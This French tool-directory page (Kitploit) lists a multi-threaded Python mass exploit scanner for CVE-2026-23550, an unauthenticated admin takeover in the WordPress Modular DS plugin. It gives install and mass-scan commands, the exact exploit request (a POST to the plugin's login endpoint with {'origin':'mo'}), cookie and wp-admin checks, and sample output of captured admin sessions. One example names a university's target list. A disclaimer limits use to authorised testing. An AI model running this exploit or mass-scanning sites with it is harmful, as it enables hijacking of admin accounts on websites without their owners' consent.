Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Mass-CVE-2026-23550-Exploit — Scanner Python multi-threadé pour CVE-2026-23550, détectant la prise de contrôle admin non authentifiée dans le plugin WordPress Modular DS avec vérification complète de wp-admin. | Kitploit
Outils/GitHubGitHub/dzmind2312/mass-cve-2026-23550-exploit
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubdzmind2312/mass-cve-2026-23550-exploit

Mass-CVE-2026-23550-Exploit

Scanner Python multi-threadé pour CVE-2026-23550, détectant la prise de contrôle admin non authentifiée dans le plugin WordPress Modular DS avec vérification complète de wp-admin.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
24il y a 7 moisPas encore vérifié
Partager

🔥 CVE-2026-23550 Scanner DS Modulaire

Scanner Python multi-threadé pour la vulnérabilité CVE-2026-23550 (CVSS 10.0) du plugin WordPress Modular DS ≤2.5.1 affectant plus de 40 000 sites. Détecte la prise de contrôle admin non authentifiée via le contournement de getLogin() avec vérification complète de l'accès wp-admin. Fonctionnalités ✨

root@kitploit:~
🔥 Détection complète de l'accès admin (cookies + vérification wp-admin)

⚡ Multi-threading (jusqu'à 50+ cibles simultanées)

📊 Barre de progression animée avec rich

🎨 Tableau récapitulatif colorisé

💾 Sauvegarde automatique des cibles vulnérables dans un fichier

🚀 Timeouts et gestion d'erreurs prêts pour la production

Installation 🚀

bash pip3 install requests rich chmod +x modular_ds.py

Utilisation 📋

bash

Scan de masse (50 threads)

python3 modular_ds.py -l targets.txt -t 50 -o bounty_vulns.txt

Recon pour bug bounty

python3 modular_ds.py -l univ-oran1.txt -t 20

Par défaut (20 threads, sortie vulns.txt)

python3 modular_ds.py -l targets.txt

Format de targets.txt :

text https://target1.com http://site2.com

Ignorer les commentaires

https://sub.domain.tld

Arguments Drapeau Description Défaut -l, --list Requis Fichier de cibles (1 URL/ligne) - -t, --threads Nombre maximal de threads simultanés 20 -o, --output Fichier de sortie des cibles vulnérables vulns.txt Exemple de sortie 🖥️

text 🔥 CVE-2026-23550 Scanner DS Modulaire 🔥 Cibles : 247 | Threads : 50 | Sortie : bounty_vulns.txt

⠋ Analyse de Modular DS... 127/247 (51%) ✅ VULNÉRABLE : https://target.com 🔥 ACCÈS ADMIN COMPLET : target.com

┌─────────────┬─────────────────────────────────────┬────────────┐ │ Statut │ Cible │ Détails │ ├─────────────┼─────────────────────────────────────┼────────────┤ │ 🔥 COMPLET │ https://target.com │ 3 cookies │ └─────────────┴─────────────────────────────────────┴────────────┘

💾 4 cibles vulnérables → bounty_vulns.txt

Logique de détection 🔍

text

  1. POST /wp-content/plugins/modular-ds/api/modular-connector/login {"origin":"mo"}
  2. ✅ Vérifier le cookie admin wordpress_logged_in_*
  3. ✅ Vérifier l'accès au tableau de bord /wp-admin/
  4. 💾 Sauvegarder les cibles confirmées avec ACCÈS ADMIN COMPLET

Utilisation légale et éthique ⚖️

text ⚠️ STRICTEMENT RÉSERVÉ À : ✅ Tests d'intrusion autorisés ✅ Programmes de bug bounty
✅ Laboratoires de recherche en sécurité ✅ Infrastructure possédée

❌ NE JAMAIS utiliser sur des cibles non autorisées

Prérequis 📦

text requests>=2.31.0 rich>=13.0.0

Télécharger l’outil